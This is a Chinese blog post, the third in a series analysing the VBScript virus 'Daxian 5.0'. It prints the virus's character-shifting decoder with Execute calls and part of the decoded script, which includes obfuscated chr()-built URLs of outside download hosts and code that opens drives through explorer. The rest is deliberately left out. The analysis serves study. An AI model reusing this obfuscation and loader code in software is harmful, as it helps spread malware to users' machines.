【冰冻苔原】
网聚无限美与忆
公告
日历
<
2007年11月
>
日
一
二
三
四
五
六
28
29
30
31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1
2
3
4
5
6
7
8
统计
随笔 - 70
文章 - 11
评论 - 99
引用 - 0
导航
博客生活
首页
发新随笔
发新文章
联系
聚合
管理
常用链接
我的随笔
我的评论
我的参与
最新评论
留言簿
(13)
给我留言
查看公开留言
查看私人留言
随笔分类
Linux学习大杂烩(4)
(rss)
编程&&电脑技术随笔(33)
(rss)
网页代码随笔(1)
(rss)
幽她一默(12)
(rss)
随笔档案
2008年11月 (1)
2007年11月 (5)
2007年10月 (1)
2007年9月 (1)
2007年8月 (3)
2007年7月 (2)
2007年6月 (1)
2007年4月 (1)
2007年2月 (2)
2006年12月 (2)
2006年10月 (1)
2006年9月 (1)
2006年8月 (2)
2006年7月 (3)
2006年6月 (1)
2006年3月 (3)
2006年2月 (9)
2006年1月 (4)
2005年12月 (7)
2005年11月 (1)
2005年10月 (1)
2005年9月 (5)
2005年8月 (8)
2005年7月 (1)
2005年1月 (3)
2004年10月 (1)
文章分类
◆写意人生◆(3)
(rss)
Visual Studio(VC、VB、C#)必学潭(4)
(rss)
实战操作系统(1)
(rss)
文章档案
2007年11月 (1)
2007年10月 (1)
2006年4月 (1)
2005年12月 (1)
2005年6月 (1)
2005年5月 (2)
2005年4月 (1)
2005年1月 (3)
相册
photo spring
收藏夹
小包包(1)
(rss)
链接无限
搜索
积分与排名
积分 - 64833
排名 - 55
最新评论
1. re: QQ“活跃天数”在线查询系统
我的QQ被黑客盗用,如何解冻,时间是多少?
--舒睿
阅读排行榜
1. Windows远程桌面连接程序(mstsc.exe)的参数【一】(9814)
2. QQ“活跃天数”在线查询系统(6055)
3. 日期时间拾取控件(简称DTP控件)和月历控件(5052)
4. Windows远程桌面连接程序(mstsc.exe)的参数【二】(3903)
5. 路由器中config-register各位的含义以及配合TFTP服务的应用(3050)
6. [转]系统必需文件收录贴!(2931)
7. 浅谈:切换视时基于FormView的对话框属性设置与ASSERT报错的问题(2777)
8. 关于天网检测到的7777端口UDP数据包与PPlive使用的关系(2712)
9. 调用工程中的theApp指针----AfxGetApp()(1919)
10. 大BOOL与小bool之间的区别(1603)
11. 学习SQLServer2000触发器的一个简单示例(1597)
12. 文档Doc中视图View(框架Frame)最大化的两种方法(1052)
13. 解决部分USB设备无法正常识别和工作的问题(887)
14. SQL Server 中 CHARINDEX和PATINDEX函数详解(875)
15. 通过技术支持工作学到的20件事(714)
16. Win2003 + SQL Server 2000 + ASP.NET + NETWORK SERVICE(700)
17. Windows系统进程详解(663)
18. “第一次心动”的男生组15进10比赛让我做了一次不可思议的心灵旅行(2007年8月10日)(650)
19. 解除Office文档保护的几则技巧(585)
20. 基本运算符优先表(558)
21. 关于Excel模板的一个小技巧(541)
22. 怎样才可以获得修改注册表中HKey_Local_Machines分支下键值的权限(534)
23. 以下是透明Flash的代码(484)
24. Windows系统服务指南(483)
25. QQ2005 Beta3里“安全中心”的隐藏功能~~(436)
26. 四两拨千斤--苍蝇大冒险(427)
27. 【Flash】感人!老公老公我爱你(有点搞笑)(394)
28. C++ 运算符优先级列表(389)
29. 各国一句话(368)
30. Daxian病毒5.0版分析志(二) (367)
31. 酷头(364)
32. Daxian病毒5.0版分析志(三) (352)
33. 又添新丁(346)
Daxian病毒5.0版分析志(三)
由于本博旨在研究此病毒,不在传播,所以会隐去一些代码,见谅
以下是那个vbs脚本里的真实代码部分(
经过转码
):
1
Da
=
"
ire=0.5gvyr=qnkvna&ire nobhg=raq
/////
shapgvba
"
以上//////部分为隐去的代码
以下是那个vbs脚本里的代码部分(
用来解码
):
1
Execute
(
"
For i=1 To Len(Da)
"
+
vbCrLf
+
"
Xian = Asc(Mid(Da,i,1))
"
+
vbCrLf
+
"
If Xian = 28 Then
"
+
vbCrLf
+
"
Xian = 13
"
+
vbCrLf
+
"
ElseIf Xian = 29 Then
"
+
vbCrLf
+
"
Xian = 10
"
+
vbCrLf
+
"
elseif Xian=18 Then
"
+
vbCrLf
+
"
Xian = 34
"
+
vbCrLf
+
"
elseif Xian>96 and Xian<110 then
"
+
vbCrLf
+
"
Xian=Xian+13
"
+
vbCrLf
+
"
elseif Xian>109 and Xian<123 then
"
+
vbCrLf
+
"
Xian=Xian-13
"
+
vbCrLf
+
"
elseif Xian>47 and Xian<53 then
"
+
vbCrLf
+
"
Xian=Xian+5
"
+
vbCrLf
+
"
elseif Xian>52 and Xian<58 then
"
+
vbCrLf
+
"
Xian=Xian-5
"
+
vbCrLf
+
"
End If
"
+
vbCrLf
+
"
DaXian = DaXian + chr(Xian)
"
+
vbCrLf
+
"
Next
"
)
2
Execute
(DaXian)
从上面的代码,大家不难看出,这是通过字符的ASCII码来进行转码的,所以解起来比较容
易,有兴趣的博友可以自己写个程序解一下。
我解出来的代码如下:
1
ver
=
"
5.0
"
2
tile
=
"
daxian
"
&
ver
3
about
=
"
daxianbiyeliunian 2007.8.7
"
4
fromurl2
=
chr
(
104
)
&
chr
(
116
)
&
chr
(
116
)
&
chr
(
112
)
&
"
://
"
&
"
u4.
"
&
chr
(
50
)
&
chr
(
50
)
&
chr
(
56
)
&
"
8.or
"
&
chr
(
103
)
&
"
/u5.
"
&
chr
(
97
)
&
"
s
"
&
chr
(
112
)
5
fromurl
=
chr
(
104
)
&
chr
(
116
)
&
chr
(
116
)
&
chr
(
112
)
&
"
://
"
&
chr
(
104
)
&
chr
(
103
)
&
"
z.
"
&
chr
(
100
)
&
"
in
"
&
chr
(
103
)
&
chr
(
104
)
&
"
ui123.
"
&
chr
(
99
)
&
"
n/u5.
"
&
chr
(
97
)
&
"
s
"
&
chr
(
112
)
6
on
error
resume
next
7
dim
wsh
8
dim
WshShell
9
Set
Wsh
=
CreateObject
(
"
WScript.Shell
"
)
10
set
WshShell
=
Wscript.CreateObject(
"
Wscript.Shell
"
)
11
Set
FSO
=
CreateObject
(
"
Scripting.FileSystemObject
"
)
12
set
dir
=
FSO.GetSpecialFolder(
1
)
13
set
win
=
FSO.GetSpecialFolder(
0
)
14
Set
dc
=
FSO.Drives
15
ouwnname
=
Wscript.ScriptName
16
exemulu
=
FSO.GetSpecialFolder(
2
)
&
"
\
"
17
mulu
=
left
(Wscript.ScriptFullName,
len
(Wscript.ScriptFullName)
-
len
(Wscript.ScriptName))
18
if
mulu
=
dir
&
"
\
"
then
sys
=
true
19
For
Each
d In dc
20
if
mulu
=
d
&
"
\
"
then
opendisk
=
WshShell.Run(
"
explorer
"
&
d,
3
,
false
)
21
Next
22
'
以下省略代码若干
23 .......................
总之代码所做的无非是做添加病毒文件和修改注册表一类的事情。
具体到VB脚本的分析偶就不再写了,以此和大家共同研究探讨。
(Daxian 5.0研究志 完)
posted on 2007-11-09 13:42
【冰冻苔原】
阅读(352)
评论(1)
编辑
收藏
所属分类:
编程&&电脑技术随笔
评论:
#
re: Daxian病毒5.0版分析志(三)
oil painting
Posted @ 2009-02-16 15:55
=========健康iiiiiiiiiiiiiiiiii
回复
更多评论
刷新评论列表
只有注册用户
登录
后才能发表评论。
该文被作者在 2007-11-13 13:36 编辑过
网站导航:
博客园
IT新闻
知识库
Java博客
C++博客
博问
管理
相关文章:
Daxian病毒5.0版分析志(三)
Daxian病毒5.0版分析志(二)
Daxian病毒5.0版分析志(一)
路由器中config-register各位的含义以及配合TFTP服务的应用
通过技术支持工作学到的20件事
解决使用金山词霸的取词功能时卡巴斯基报错的问题
解决部分USB设备无法正常识别和工作的问题
C++ 运算符优先级列表
卡巴斯基终于恢复正常更新了~~
彻底解决卡巴斯基抽羊角风的恶习[转]
Copyright © 【冰冻苔原】
Powered by:
博客园
模板提供:
沪江博客